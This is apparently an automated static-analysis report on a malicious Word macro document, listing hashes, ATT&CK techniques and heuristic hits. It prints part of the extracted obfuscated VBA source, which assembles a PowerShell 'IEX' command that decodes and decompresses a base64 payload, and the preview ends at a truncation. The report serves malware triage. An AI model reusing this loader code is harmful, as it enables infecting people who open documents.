Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 182d24bec966cb46…

MALICIOUS

Office (OLE)

Size: 81.0 KB
Created: 2018-05-22 21:01:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: 3cde53ff4f9826a11d66eb426e8a1117
SHA-1: 0162db007053e1d7265ff385931217c9cb9a7728
SHA-256: 182d24bec966cb46923e6284bafa49ab355597bfb6cc610faa29b32c47ababbe
Risk score: 144

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office (OLE) Word document containing VBA macros. The AutoOpen macro runs when the document is opened and invokes a Shell() command, behaviour that is highly indicative of downloading and executing a second-stage payload. The extracted 'macros.bas' file, which holds the obfuscated macro source, further supports this, and the delivery technique is likely Spearphishing Attachment.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code contains a Shell() call.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA code defines an AutoOpen macro, which runs automatically when the document is opened.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 72946 bytes
SHA-256: 13c9663719769b3c6be38011fea83dfd07444420dfed66806048948b8dd800e8
Detection
ClamAV: No threats found
Obfuscation or payload: likely (the carved artifact contains 4 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "KTJwjlZcGzv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function bvfcE()

On Error Resume Next
pizLQb = BibjKCnC + CSng(700354) + 868271 / Sin(965063 - CByte(699836) / 653062 - Round(700354)) + vzzczvA * lpDBtu - (868271 + 965063 + 699836 - 7003540)
Set KdvtzRLTR = jzjJXMq
sFWDrlE = "l9ozfTHzowpDmhIjzX(neW-oBjeCt3emUl4cTchaTeQpDershell  Iex6KDPUXMr3 1cfFMsS9DuMUjo"
jlshibrI = Left(Right(sFWDrlE, 73), 2) + CStr(Left(Right(sFWDrlE, 36), 11)) + CStr(Left(Right(sFWDrlE, 64), 12)) + CStr(Left(Right(sFWDrlE, 15), 1)) + CStr(Left(Right(sFWDrlE, 8), 1))

lNEzA = "5R66D7HdjezXY9iyLSn5e240RYStEm.io.StrEaMReao4zptMbO4ApR3M6fMqER( (neWC5srS05aFvS1OWTeXRx-oBmmFUh"
TFCNHnQE = Left(Right(lNEzA, 71), 18) + CStr(Left(Right(lNEzA, 89), 1)) + CStr(Left(Right(lNEzA, 35), 8)) + Left(Right(lNEzA, 8), 3) + CStr(Left(Right(lNEzA, 88), 2))

bBKMTO = "5R66D7HaITAM(9iyLSn5e240RrHt43bCt  sYsTEM.IO.COmprESSpR3M6fMqOVHrOk1vC5srS05on.DeflaTERx6A9mmFUh3AxgEoxAWWDhpSTREDKRr2dK"
FnIrapLUkSn = CStr(Left(Right(bBKMTO, 89), 22)) + CStr(Left(Right(bBKMTO, 112), 1)) + Left(Right(bBKMTO, 44), 10) + CStr(Left(Right(bBKMTO, 11), 4)) + Left(Right(bBKMTO, 110), 3)

mMtzWVIsm = "v55R.6D7HaKTzX [SySteM.Io0RrHt43bbnXDMemOr5ZRo4zptMbOyspR"
WGmakzIJh = Left(Right(mMtzWVIsm, 43), 11) + CStr(Left(Right(mMtzWVIsm, 53), 1)) + CStr(Left(Right(mMtzWVIsm, 20), 5)) + CStr(Left(Right(mMtzWVIsm, 4), 2))

iJScBAwRh = "5R66D7Hee6zXY9iyLSn5e240RTrEam][sySTEM.ConVo4zptMbO4ApR3M6fMqOVRt]::FROMrS05aFvS1OWTeXRx6A9BasUh3Ax"
HocrGoHf = Left(Right(iJScBAwRh, 74), 18) + CStr(Left(Right(iJScBAwRh, 92), 1)) + CStr(Left(Right(iJScBAwRh, 36), 9)) + Left(Right(iJScBAwRh, 8), 3) + CStr(Left(Right(iJScBAwRh, 91), 2))

VoOnQMNP = "5R66V1HaKTzXY9iy4stRINg( 'ZV43bbnXDWtSbLhb9pIzptMbO4ApR3M6EPqOV"
dECSwUoKCW = CStr(Left(Right(VoOnQMNP, 47), 12)) + CStr(Left(Right(VoOnQMNP, 59), 1)) + CStr(Left(Right(VoOnQMNP, 23), 5)) + Left(Right(VoOnQMNP, 5), 2) + CStr(Left(Right(VoOnQMNP, 58), 1))

qYUszw = Chr(43)
ppQisFOf = "5R66D7HaETklI9iyLSn5e240RrHt43b0v2HVVUdtgIO67UNDoruqKpR3M6fMqOVHrOk1vC5srS05qEk3SUI5GVRx6A9mmFUh3AxgEoxAWWDhpT7YxDKRr2dK"
nXpHuLj = CStr(Left(Right(ppQisFOf, 89), 22)) + CStr(Left(Right(ppQisFOf, 112), 1)) + Left(Right(ppQisFOf, 44), 10) + CStr(Left(Right(ppQisFOf, 11), 4)) + Left(Right(ppQisFOf, 110), 3)
jiTktIX = IwWKqmQ + CSng(686597) + 672561 / Sin(447873 - CByte(247017) / 97392 - Round(686597)) + ZaTwB * uKRdKahbCB - (672561 + 447873 + 247017 - 6865970)
Set swwAi = azswjnQcBY
RMTQDJZ = "v5rR66DYe3aTpXY9iyLSIxe240Rr3t"
nzoJQ = Left(Right(RMTQDJZ, 23), 6) + CStr(Left(Right(RMTQDJZ, 28), 1)) + CStr(Left(Right(RMTQDJZ, 10), 2)) + CStr(Left(Right(RMTQDJZ, 2), 1))

DWiwslJI = Chr(43)
VwiDLr = "v55E66D7HaK/N95dqBTSn5e240RrsrMzbbnXDWtSbO7ZR"
ZOOzKIkojY = Left(Right(VwiDLr, 34), 8) + CStr(Left(Right(VwiDLr, 42), 1)) + Left(Right(VwiDLr, 17), 4) + Left(Right(VwiDLr, 4), 2)

jEwfXoDtU = "v5vR66D7HaOzb94slyLSn5e24Wu4Ht43bbnXeGt"
VQzEMDEAuzs = CStr(Left(Right(jEwfXoDtU, 29), 7)) + Left(Right(jEwfXoDtU, 37), 1) + Left(Right(jEwfXoDtU, 14), 3) + Left(Right(jEwfXoDtU, 3), 2)

dMtQSsp = Chr(43)
vkmEIJ = "5R66D7HajTd2c9iyLSn5e240RrHt43b4XzfBPtG7Bt3gNVw3/QhuhpR3M6fMqOVHrOk1vC5srS057xscvVqTHFRx6A9mmFUh3AxgEoxAWWDhpu5hiDKRr2dK"
zrrbaoa = CStr(Left(Right(vkmEIJ, 89), 22)) + CStr(Left(Right(vkmEIJ, 112), 1)) + Left(Right(vkmEIJ, 44), 10) + CStr(Left(Right(vkmEIJ, 11), 4)) + Left(Right(vkmEIJ, 110), 3)

zkHnEDd = "v55S66D7HaKNmAfnF0MSn5e240RrC4FgbbnXDWtSbJaZR"
zDJIkUHnX = Left(Right(zkHnEDd, 34), 8) + CStr(Left(Right(zkHnEDd, 42), 1)) + Left(Right(zkHnEDd, 17), 4) + Left(Right(zkHnEDd, 4), 2)

lFnmT = "v53R66D7MCMTJmY9iyLSnzhg40RrHt4Cb"
mphINljsl = CStr(Left(Right(lFnmT, 25), 6)) + Left(Right(lFnmT, 31), 1) + CStr(Left(Right(lFnmT, 12), 3)) + CStr(Left(Right(lFnmT, 2), 1))
IEGtnFznq = GuhDmNGk + CSng(354576) + 923554 / Sin(831942 - CByte(68
... (truncated)